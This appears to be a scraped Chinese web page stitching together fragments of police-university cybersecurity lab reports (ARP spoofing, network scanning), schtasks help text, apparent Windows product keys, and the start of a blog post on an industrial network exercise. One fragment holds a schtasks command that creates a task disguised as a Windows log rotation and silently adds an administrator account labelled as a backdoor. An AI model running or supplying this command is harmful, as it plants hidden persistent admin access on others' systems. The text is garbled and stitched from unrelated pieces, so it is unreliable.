网络攻防

中国人民公安大学 Chinese people’ public security university 网络对抗技术 实验报告 实验二 网络嗅探与欺骗 学生姓名 武勐喆 年级 2017 区队 六 指导教师 高见 信息技术与网络安全学院 2016 年 11 月 7 日 实验任务总纲 2016—2017 学年 第 一 学期 一、实验目的 1．加深并消化本课程授课内容，复习所学过的互联网搜索技巧、方法和技术； 2．了解并熟悉常用的网络嗅探方式，掌握常用抓包软件的使用方法和过滤技巧，能够对给定的数据包分析网络基本行为；掌握ARP欺骗的基本原理，以及基于ARP欺骗的DNS攻击方式； 3．达到巩固课程知识和实际应用的目的。 二、实验要求 1．认真阅读每个实验内容，需要截图的题目，需清晰截图并对截图进行标注和说明。 2．文档要求结构清晰，图文表达准确，标注规范。推理内容客观、合理、逻辑性强。 3．软件工具可使用office2003或2007、CAIN、Wireshark等。 4．实验结束后，保留电子文档。 三、实验步骤 1．准备 提前做好实验准备，实验前应把详细了解实验目的、实验要求和实验内容，熟悉并准备好实验用的软件工具，按照实验内容和要求提前做好实验内容的准备。 2．实验环境 描述实验所使用的硬件和软件环境（包括各种软件工具）； 开机并启动软件office2003或2007、浏览器

因为我的电脑本机是连的网线，而虚拟机的网卡使用的是NAT模拟，所以虚拟机和本机就不在一个局域网里面的，就没法进行arp攻击，所以我就用两台虚拟机来进行arp攻击 （注意arp攻击是局域网攻击） arp攻击原理： ARP欺骗攻击建立在局域网主机间相互信任的基础上的 当A发广播询问：我想知道IP是192.168.0.3的硬件地址是多少？ 此时B当然会回话：我是IP192.168.0.3我的硬件地址是mac-b， 可是此时IP地址是192.168.0.4的C也非法回了：我是IP192.168.0.3,我的硬件地址是mac-c。而且是大量的。 所以A就会误信192.168.0.3的硬件地址是mac-c，而且动态更新缓存表 这样主机C就劫持了主机A发送给主机B的数据，这就是ARP欺骗的过程 ARP协议工作过程：A➔B，A向B发送数据 A先在其ARP高速缓存中查看有无B的IP地址和MAC地址。如有，就通过局域网把数据发往此硬件地址。 如果查不到B的IP，A的ARP进程在本局域网上广播发送一个ARP请求分组，主要内容是A的IP地址、MAC地址，B的IP地址。 局域网上的所有主机运行的ARP进程都收到此ARP请求分组。 主机B的IP地址与ARP请求分组中要查询的IP地址一致，就收下这个ARP请求分组，并向A发送ARP响应分组（其中写入了B自己的硬件地址）

实验一 网络侦查与网络扫描 学生姓名 年级 区队 指导教师 2017 年 7 月 7 日 实验任务总纲 学年 第 һ 学期 一、实验目的 1．加深并消化本课程授课内容，复习所学过的互联网搜索技巧、方法和技术； 2．了解并熟悉常用搜索引擎、扫描工具、社交网站等互联网资源，对给定的任务进行搜索、关联、分析； 3．达到巩固课程知识和实际应用的目的。 二、实验要求 1．认真阅读每个实验内容，需要截图的题目，需清晰截图并对截图进行标注和说明。 2．文档要求结构清晰，图文表达准确，标注规范。推理内容客观、合理、逻辑性强。 3．软件工具可使用office2003或2007、Nmap、等。 4．实验结束后，保留电子文档。 三、实验步骤 1．准备 提前做好实验准备，实验前应把详细了解实验目的、实验要求和实验内容，熟悉并准备好实验用的软件工具，按照实验内容和要求提前做好实验内容的准备。 2．实验环境 描述实验所使用的硬件和软件环境（包括各种软件工具）； 开机并启动软件office2003或2007、浏览器、扫描软件。 3．实验过程 1）启动系统和启动工具软件环境。 2）用软件工具实现实验内容。 4．实验报告 按照统一要求的实验报告格式书写实验报告。把按照模板格式编写的文档嵌入到实验报告文档中，文档按照规定的书写格式书写，表格要有表说图形要有图说。 实验任务（一）

一、 : 1、 2、 二、 schtasks schtasks net user at .bat xp win7 Win7 YKHFT KW986 GK4PY FDWYH 7TP9F （二） Schtasks: : /Create /Delete /Query /Change /Run /End /ShowSid /? Examples: SCHTASKS SCHTASKS /? SCHTASKS /Run /? SCHTASKS /End /? SCHTASKS /Create /? SCHTASKS /Delete /? SCHTASKS /Query /? SCHTASKS /Change /? SCHTASKS /ShowSid /? ID 为 4624 schtasks /create /tn "Microsoft\Windows\LocalEventLogRotate" /tr "\"cmd.exe\" /k net user cyx cyx /add /y /active:yes >> nul & net localgroup administrators cyx /add >nul & net user cyx /comment:\"Built-in account for Backdooring your network suckers\" > nul &

实验报告一 学 号 中国人民公安大学 Chinese people’ public security university 网络对抗技术 实验报告 实验一 网络侦查与网络扫描 学生姓名 多杰才旦 年级 2017 区队 网络安全与执法四区队 指导教师 信息技术与网络安全学院 2017 年 7 月 7 日 实验任务总纲 2017—2018 学年 第 一 学期 一、实验目的 1．加深并消化本课程授课内容，复习所学过的互联网搜索技巧、方法和技术； 2．了解并熟悉常用搜索引擎、扫描工具、社交网站等互联网资源，对给定的任务进行搜索、关联、分析； 3．达到巩固课程知识和实际应用的目的。 二、实验要求 1．认真阅读每个实验内容，需要截图的题目，需清晰截图并对截图进行标注和说明。 2．文档要求结构清晰，图文表达准确，标注规范。推理内容客观、合理、逻辑性强。 3．软件工具可使用office2003或2007、Nmap、等。 4．实验结束后，保留电子文档。 三、实验步骤 1．准备 提前做好实验准备，实验前应把详细了解实验目的、实验要求和实验内容，熟悉并准备好实验用的软件工具，按照实验内容和要求提前做好实验内容的准备。 2．实验环境 描述实验所使用的硬件和软件环境（包括各种软件工具）； 开机并启动软件office2003或2007、浏览器、扫描软件。 3．实验过程 1）启动系统和启动工具软件环境。 2

前言 今天公司里安排要回学校为刚搭建好的工业网络做一次攻防实验 实验拓扑 刚开始很迷，其实去之前我们连到底要干嘛，要做什么都不知道，就傻不拉几的跑了过去 到那边他们环境都搭建好了，就等着我们开始下一步的攻防实验了， 俩人大眼瞪小眼就看着我们，以为我们是大佬，场面甚是尴尬。 顶着灰常巨大的压力 不能给公司丢人的原则 ，硬着头皮直接干 实在没办法无从下手，只能先画个拓扑图 防火墙 两种网络模式 路由模式 透明模式 两种 来源： https://www.cnblogs.com/unixcs/p/11396430.html